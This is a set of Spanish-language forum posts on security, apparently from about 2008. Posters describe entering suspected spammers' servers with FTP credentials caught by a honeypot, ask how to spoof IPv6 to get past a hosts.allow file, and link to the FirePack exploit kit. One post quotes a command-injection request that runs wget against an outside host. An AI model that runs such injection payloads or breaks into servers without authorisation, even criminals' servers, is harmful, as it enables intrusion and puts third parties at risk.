Esto lo estuve usando hace unos días, solo que usándolo para hacerme con los permisos del servidor.

Es decir, carpetas que accediendo normalmente te daban un forbidden, poniendo esta redirección podia ver todos los archivos

Ale ya tenéis otra utilidad para esto, lo descubrí la semana pasada y funciona :p

Pero el mundo no se acababa en 2010? o era en 2012? Bueno, que por q preocuparnos del 2029 si segun los incas nos moriremos todos antes XDDDDD

Saludos.

P.D. Mejor q dejen el asteroide en su sitio, que aun aumentaremos las posibilidades de choque.

Avanzando en mis investigaciones

Ya tengo las fotos de los supuestos delicuentes, si estuve accediendo a su servidor web y a algunos de sus logs, y los muy burros se hicieron fotos. Al parecer son Pakistanis y se estan dedicando a robar cuentas de paypal, la mayoria a Americanos, aunq por el archivos de mails no me extrañaria que empezaran por aqui dentro de poco.

Ademas tienen un monton de pc's infectados, desde donde supongo que envian los spams. Aunq todavia no tengo claro como funciona ese malware, si bien ya tengo todos los .exe e incluso un archivo servidor compilado para freebsd.

Si alguno quiere ayudar, os puedo pasar mas datos por mail.

Un saludo.

Mejor.

Buen link.

Nunca desactives el antivirus, no te estan atacando a ti especificamente, estan atacando un monton de pc's y si alguno se infecta, pues infectado queda.

Lo dicho, un router con firewall integrado, un firewall en el pc, las ultimas actualizaciones y listo.

Puedes tener por seguro que no es algo personal. Pasate por este enlace, igual te es de utilidad: (AUTOBOMBO)

http://revoluciondigital.blogspot.com/2008/02/nepenthes-o-como-comprobar-como-esta-el.html

Ultimamente hay un ataque DDOS contra varias webs por difundir que ciertas paginas para saber quien te tiene admitido es un fraude, asi q no me extrañaria que fuera una de las personas afectadas por esta estafa.

Preguntale si se dio de alta en alguno de esos servicios, igual puedes investigar por ahi, o mejor aun, poner denuncia.

Saludos.

Buenas, he conseguido, a traves de un honeypot que he instalado hace unos dias, el login y password de un ftp de un spamer que intentaba infectar mi maquina con un troyano despues de haberme hackeado (en realidad hackeo el honeypot)

El tema es que el servidor es un freebsd, y tiene tambien el puerto de ssh abierto. Al intentar entrar me expulsa nada mas logonearme. Imagino que por la configuracion del hosts.allow.

Alguien sabe como puedo interpretar esto? Alguien sabe si es complicado falsear una direccion IP/V6 ? La verdad es q estoy completamente verde en tema de ip/v6 asi q si alguno ha trabajado con ello lo agradeceria.

pinger@srv:~/vudu$ cat hosts.allow
#
# hosts.allow access control file for "tcp wrapped" applications.
# $FreeBSD: src/etc/hosts.allow,v 1.19.8.1 2006/02/19 14:57:01 ume Exp $
#
# NOTE: The hosts.deny file is deprecated.
#       Place both 'allow' and 'deny' rules in the hosts.allow file.
#       See hosts_options(5) for the format of this file.
#       hosts_access(5) no longer fully applies.

#        _____                                      _          _
#       | ____| __  __   __ _   _ __ ___    _ __   | |   ___  | |
#       |  _|   \ \/ /  / _` | | '_ ` _ \  | '_ \  | |  / _ \ | |
#       | |___   >  <  | (_| | | | | | | | | |_) | | | |  __/ |_|
#       |_____| /_/\_\  \__,_| |_| |_| |_| | .__/  |_|  \___| (_)
#                                          |_|
# !!! This is an example! You will need to modify it for your specific
# !!! requirements!


# Start by allowing everything (this prevents the rest of the file
# from working, so remove it when you need protection).
# The rules here work on a "First match wins" basis.
ALL : ALL : allow

# Wrapping sshd(8) is not normally a good idea, but if you
# need to do it, here's how
#sshd : .evil.cracker.example.com : deny

# Protect against simple DNS spoofing attacks by checking that the
# forward and reverse records for the remote host match. If a mismatch
# occurs, access is denied, and any positive ident response within
# 20 seconds is logged. No protection is afforded against DNS poisoning,
# IP spoofing or more complicated attacks. Hosts with no reverse DNS
# pass this rule.
ALL : PARANOID : RFC931 20 : deny

# Allow anything from localhost.  Note that an IP address (not a host
# name) *MUST* be specified for rpcbind(8).
ALL : localhost 127.0.0.1 : allow
# Comment out next line if you build libwrap with NO_INET6=yes.
ALL : [::1] : allow
ALL : my.machine.example.com 192.0.2.35 : allow

# To use IPv6 addresses you must enclose them in []'s
ALL : [fe80::%fxp0]/10 : allow
ALL : [fe80::]/10 : deny
ALL : [2001:db8:2:1:2:3:4:3fe1] : deny
ALL : [2001:db8:2:1::]/64 : allow

# Sendmail can help protect you against spammers and relay-rapers
sendmail : localhost : allow
sendmail : .nice.guy.example.com : allow
sendmail : .evil.cracker.example.com : deny
sendmail : ALL : allow

# Exim is an alternative to sendmail, available in the ports tree
exim : localhost : allow
exim : .nice.guy.example.com : allow
exim : .evil.cracker.example.com : deny
exim : ALL : allow

# Rpcbind is used for all RPC services; protect your NFS!
# (IP addresses rather than hostnames *MUST* be used here)
rpcbind : 192.0.2.32/255.255.255.224 : allow
rpcbind : 192.0.2.96/255.255.255.224 : allow
rpcbind : ALL : deny

# NIS master server. Only local nets should have access
ypserv : localhost : allow
ypserv : .unsafe.my.net.example.com : deny
ypserv : .my.net.example.com : allow
ypserv : ALL : deny

# Provide a small amount of protection for ftpd
ftpd : localhost : allow
ftpd : .nice.guy.example.com : allow
ftpd : .evil.cracker.example.com : deny
ftpd : ALL : allow

# You need to be clever with finger; do _not_ backfinger!! You can easily
# start a "finger war".
fingerd : ALL \
        : spawn (echo Finger. | \
         /usr/bin/mail -s "tcpd\: %u@%h[%a] fingered me!" root) & \
        : deny

# The rest of the daemons are protected.
ALL : ALL \
        : severity auth.info \
        : twist /bin/echo "You are not welcome to use %d from %h."

Esto lo he bajado del servidor a traves del ftp por donde me querian colar el troyano.

Sobre como se que es un spammer ... porq no creo q mucha gente tenga 700 megas en mails.

Saludos.

He conseguido encontrar otro parecido tambien en los foros de esta gente llamado FirePack. Me esta empezando a acojonar navegar por paginas web :S

El post donde se comenta este Pack:
http://www.ryan1918.com/viewtopic.php?p=112782&sid=a5e27d7a63798082f25f88f70f1253ed

Para bajar FirePack (Solo con fines de testing, ya es bastante insegura la red como para que que se llene de lamers usando software como este)
http://rapidshare.com/files/73861794/FirePack.rar.html

No se si te servira para este cisco en concreto, pero puedes mirarte esto:

http://www.phenoelit-us.org/ultimaratio/index.html

Buenas hace como ... unos mil o dos mil años que no posteo por aqui, pero he encontrado esto y parece que dara que hablar de aqui a unos meses. De momento es un herramienta privada que estan vendiendo por mas de 3000 dolares.

Alguien sabe algo? Alguien lo ha conseguido?

Por lo que he podido ver en http://www.ryan1918.com/viewtopic.php?t=15095
se trata de un framework de ataque automatico. El foro es un foro en el que abundan Botneteros y spamers ( supongo q por eso pueden pagar 3000 euros por una M ierda de programa,j Oder, odio que pongan * en lugar de tacos C oño )

Nada mas, saludos.

Holas gentes, la verdad es es mi primer post aqui, pero llevo ya mucho tiempo estudiando protocolos, algo de programacion ... Bueno al lio, q no entiendo bien este xploit, aparte de q funcione o deje de funcionar.

GET /login/?user=|%22%60cd /opt;wget http://www.terock.net/mt/archives/.cp/whos;"

En lo q se supone q es el hack en si, realizas dos acciones no?
Una hace una peticion al servidor por /login/?user=|%22%60cd /opt 

Supongo q el | lo q hace es enviar un comando "oculto" dentro del formulario por llamarlo de alguna manera. Pero q representa el %22 y el %60. He estado buscando pero es complicado encontrar algo util por %22 y %60.

Algun texto q me pueda servir?

La otra duda, es porq hace el get a ese servidor, he estado mirando si aun existe, pero la pagina da un error 404. NOT FOUND :p

Bueno espero q no me catalogueis de lammer en mi primer post, un saludo.